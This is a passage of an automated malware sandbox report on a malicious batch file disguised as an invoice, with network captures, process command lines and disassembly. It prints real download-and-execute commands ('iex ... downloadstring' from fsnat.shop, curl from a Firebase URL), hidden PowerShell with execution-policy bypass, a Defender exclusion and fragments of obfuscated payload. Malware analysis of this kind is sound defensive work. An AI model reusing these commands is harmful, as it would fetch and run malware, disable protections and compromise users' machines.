                                                                                                        Oct 27, 2024 00:21:47.051057100 CEST94OUTData Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 36
                                                                                                        Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 64-Bit CPU
                                                                                                        Oct 27, 2024 00:21:47.884037018 CEST209INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 26 Oct 2024 22:21:46 GMT
                                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                                        Content-Length: 6
                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Data Raw: 42 72 61 7a 69 6c
                                                                                                        Data Ascii: Brazil


                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.11.204975293.127.200.2114437380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-26 22:21:57 UTC77OUTGET /a/08/150822/up/up HTTP/1.1
                                                                                                        Host: fsnat.shop
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-10-26 22:21:57 UTC323INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 26 Oct 2024 22:21:57 GMT
                                                                                                        Server: Apache/2.4.58 (Ubuntu)
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Content-Security-Policy: upgrade-insecure-requests
                                                                                                        Last-Modified: Sat, 19 Oct 2024 12:57:29 GMT
                                                                                                        ETag: "675b-624d3f649e040"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 26459
                                                                                                        Connection: close
                                                                                                        2024-10-26 22:21:57 UTC7869INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 5f 5f 5f 2f 2f 2f 2f 2f 2f 2f 2f 2f 20 7b 20 0d 0a 5b 63 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 20 20 20 20 20 0d 0a 70 61 72 61 6d 20 28 20 0d 0a 5b 73 74 72 69 6e 67 5d 24 43 6f 6d 70 75 74 65 72 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 20 2c 20 0d 0a 24 43 72 65 64 65 6e 74 69 61 6c 20 0d 0a 29 20 0d 0a 20 20 20 20 42 45 47 49 4e 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 77 6d 69 51 75 65 72 79 20 3d 20 22 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 22 20 0d 0a 20 20 20 20 20 20 20 20 7d 20 0d 0a 20 20 20 20 50 52 4f 43 45 53 53 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 20 20 24 41 6e 74 69
                                                                                                        Data Ascii: function ____///////// { [cmdletBinding()] param ( [string]$ComputerName = "$env:computername" , $Credential ) BEGIN { $wmiQuery = "SELECT * FROM AntiVirusProduct" } PROCESS { $Anti
                                                                                                        2024-10-26 22:21:58 UTC8000INData Raw: 5f 5f 7c 7c 7c 7c 7c 7c 5f 7c 7c 7c 7c 7c 7c 5f 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 3d 20 47 65 74 2d 52 61 6e 64 6f 6d 20 2d 49 6e 70 75 74 4f 62 6a 65 63 74 20 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 2e 54 6f 55 70 70 65 72 28 29 20 2d 43 6f 75 6e 74 20 31 0d 0a 66 6f 72 65 61 63 68 28 24 6e 20 69 6e 20 24 7b 5f 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 29 20 7b 0d 0a 24 7b 5f 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 7c 2f 2f 2f 2f 2f 2f 5c 5c 5c 5c 5c 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 7d 20 2b 3d 20 24 6e 0d 0a 7d 0d 0a 66 6f 72 65 61 63 68 20 28 24
                                                                                                        Data Ascii: __||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1foreach($n in ${__|||||||||||||//////\\\\\________________}) {${_|||||||||||||//////\\\\\________________} += $n}foreach ($
                                                                                                        2024-10-26 22:21:58 UTC8000INData Raw: 20 20 0d 0a 20 20 20 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 2d 43 6f 6d 4f 62 6a 65 63 74 20 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 20 3d 20 24 7b 5f 5f 2f 5c 5f 2f 3d 5c 2f 3d 5c 2f 3d 3d 3d 3d 3d 7d 2e 43 72 65 61 74 65 53 68 6f 72 74 63 75 74 28 24 7b 5f 5f 5f 2f 5c 5f 2f 3d 5c 5f 5f 5f 2f 5c 5f 2f 3d 3d 7d 29 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 2e 54 61 72 67 65 74 50 61 74 68 20 3d 20 22 24 7b 2f 5f 2f 2f 5f 2f 2f 5f 2f 7d 22 20 20 20 20 20 20 20 0d 0a 20 20 20 20 24 7b 2f 3d 5c 2f 5c 5f 5f 2f 3d 5c 2f 3d 5c 2f 3d 5c 5f 7d 2e 41 72 67 75 6d 65 6e 74 73 20 3d 20
                                                                                                        Data Ascii: ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}" ${/=\/\__/=\/=\/=\_}.Arguments =
                                                                                                        2024-10-26 22:21:58 UTC2590INData Raw: 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 2e 61 74 22 29 20 2d 50 61 74 68 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 63 24 7b 5f 74 78 5f 7d 22 29 0d 0a 52 65 6e 61 6d 65 2d 49 74 65 6d 20 2d 4e 65 77 4e 61 6d 65 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 5f 7d 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 5c 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 2e 6d 64 61 74 22 29 20 2d 50 61 74 68 20 28 22 24 7b 5f 5c 5c 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f
                                                                                                        Data Ascii: \\___\\\\/|_}.at") -Path ("${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\c${_tx_}")Rename-Item -NewName ("${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.mdat") -Path ("${_\\////////////////////


                                                                                                        Statistics

                                                                                                        CPU Usage

                                                                                                        Click to jump to process

                                                                                                        Memory Usage

                                                                                                        Click to jump to process

                                                                                                        High Level Behavior Distribution

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Target ID:0
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Factura-2410-CFDI.bat" "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:1
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:2
                                                                                                        Start time:18:21:22
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\curl.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:curl "https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0803-44a8-b1e0-254f44c155e2" -o "C:\Users\Public\Documents\vs1.ps1"
                                                                                                        Imagebase:0x7ff6eb9c0000
                                                                                                        File size:421'376 bytes
                                                                                                        MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:4
                                                                                                        Start time:18:21:23
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\vs1.ps1"
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:5
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\computer_kjfech8_V.cmd" "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:6
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:7
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://fsnat.shop/a/08/150822/up/up') "
                                                                                                        Imagebase:0x7ff6e4eb0000
                                                                                                        File size:289'792 bytes
                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:8
                                                                                                        Start time:18:21:55
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell.exe -nop -win 1 -
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:9
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\_kjfech8_V\_kjfech8_Vi7.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\_kjfech8_V\_kjfech8_Vi7.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:15'936 bytes
                                                                                                        MD5 hash:4AFCAB972E98ECBF855F915B2739F508
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:moderate
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:10
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\_kjfech8_V\_kjfech8_Vi7.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\_kjfech8_V\_kjfech8_Vi7.exe"
                                                                                                        Imagebase:0xd00000
                                                                                                        File size:15'936 bytes
                                                                                                        MD5 hash:4AFCAB972E98ECBF855F915B2739F508
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Borland Delphi
                                                                                                        Reputation:moderate
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:13
                                                                                                        Start time:18:22:03
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\_kjfech8_V"
                                                                                                        Imagebase:0xaf0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:18:22:04
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff742170000
                                                                                                        File size:875'008 bytes
                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:18:22:04
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 1184
                                                                                                        Imagebase:0x2d0000
                                                                                                        File size:482'640 bytes
                                                                                                        MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:18
                                                                                                        Start time:18:22:05
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                        Imagebase:0x7ff6a4320000
                                                                                                        File size:496'640 bytes
                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        General

                                                                                                        Target ID:19
                                                                                                        Start time:18:22:33
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\shutdown.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\system32\shutdown.exe" /r /t 10
                                                                                                        Imagebase:0x7ff652020000
                                                                                                        File size:28'160 bytes
                                                                                                        MD5 hash:F2A4E18DA72BB2C5B21076A5DE382A20
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        General

                                                                                                        Target ID:20
                                                                                                        Start time:18:22:59
                                                                                                        Start date:26/10/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:powershell -NoProfile -ExecutionPolicy Bypass -Command "$psakeDir = ([array](dir """C:\Users\user\Desktop\vendor\packages\psake.*"""))[-1]; ".$psakeDir\tools\psake.ps1" build.psake.ps1 -ScriptPath "$psakeDir\tools" ; if ($psake.build_success -eq $false) { exit 1 } else { exit 0 }"
                                                                                                        Imagebase:0x7ff7245a0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Non-executed Functions

                                                                                                          Function 6FDCDF35 Relevance: 120.8, APIs: 80, Instructions: 808fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDCDF58
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCDF63
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6FDCDF7E
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCDF8B
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFA7
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFC4
                                                                                                          • _errno.MSVCR100 ref: 6FDCDFD1
                                                                                                            • Part of subcall function 6FDCD485: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,6FDCD5C5,?), ref: 6FDCD4AA
                                                                                                            • Part of subcall function 6FDCD485: FileTimeToSystemTime.KERNEL32(?,6FDCD5C5,?,?,6FDCD5C5,?), ref: 6FDCD4BC
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE035
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE04D
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE074
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE07F
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE090
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE09B
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE0AA
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE0B4
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0D0
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0EC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE0F9
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE15D
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE172
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE19B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE1A6
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 6FDCE1CC
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE1DD
                                                                                                          • _errno.MSVCR100 ref: 6FDCE1F9
                                                                                                          • _errno.MSVCR100 ref: 6FDCE206
                                                                                                          • _errno.MSVCR100 ref: 6FDCE213
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?,00000000), ref: 6FDCE290
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 6FDCE2AD
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE2D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE2E2
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE2F2
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE2FD
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE30C
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE316
                                                                                                          • _errno.MSVCR100 ref: 6FDCE332
                                                                                                          • _errno.MSVCR100 ref: 6FDCE34E
                                                                                                          • _errno.MSVCR100 ref: 6FDCE35B
                                                                                                            • Part of subcall function 6FDCD9BC: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,6FDCD808,?,00000000), ref: 6FDCD9E1
                                                                                                            • Part of subcall function 6FDCD9BC: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,6FDCD808,?,00000000), ref: 6FDCD9F3
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE3D7
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE3EC
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE415
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE420
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?), ref: 6FDCE43B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE448
                                                                                                          • _errno.MSVCR100 ref: 6FDCE464
                                                                                                          • _errno.MSVCR100 ref: 6FDCE481
                                                                                                          • _errno.MSVCR100 ref: 6FDCE48E
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE4FB
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE513
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE53A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE545
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE556
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE561
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE570
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE57A
                                                                                                          • _errno.MSVCR100 ref: 6FDCE596
                                                                                                          • _errno.MSVCR100 ref: 6FDCE5B2
                                                                                                          • _errno.MSVCR100 ref: 6FDCE5BF
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE62C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE641
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE66A
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE675
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 6FDCE69B
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE6AC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6C8
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6D5
                                                                                                          • _errno.MSVCR100 ref: 6FDCE6E2
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?,00000000), ref: 6FDCE756
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 6FDCE773
                                                                                                          • _errno.MSVCR100(?), ref: 6FDCE79D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDCE7A8
                                                                                                          • _errno.MSVCR100(00000000,?), ref: 6FDCE7B8
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(00000000,?), ref: 6FDCE7C3
                                                                                                          • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6FDCE7D2
                                                                                                          • GetLastError.KERNEL32 ref: 6FDCE7DC
                                                                                                          • _errno.MSVCR100 ref: 6FDCE7F8
                                                                                                          • _errno.MSVCR100 ref: 6FDCE814
                                                                                                          • _errno.MSVCR100 ref: 6FDCE821
                                                                                                          • wcscpy_s.MSVCR100(?,00000104,?,?,?,?), ref: 6FDCE894
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDCE8A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$File$_invalid_parameter_noinfo$ErrorFindLastTime_invoke_watsonwcscpy_s$FirstNext$LocalSystem$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1405311575-0
                                                                                                          • Opcode ID: 339766c4a845259cf0957da36fb5894242d679fe679fa732184e63be4be5ff8d
                                                                                                          • Instruction ID: 6d87e56a841ffb15923eda408c6a93fbef97f702ee1d6da95546f34890e5c64f
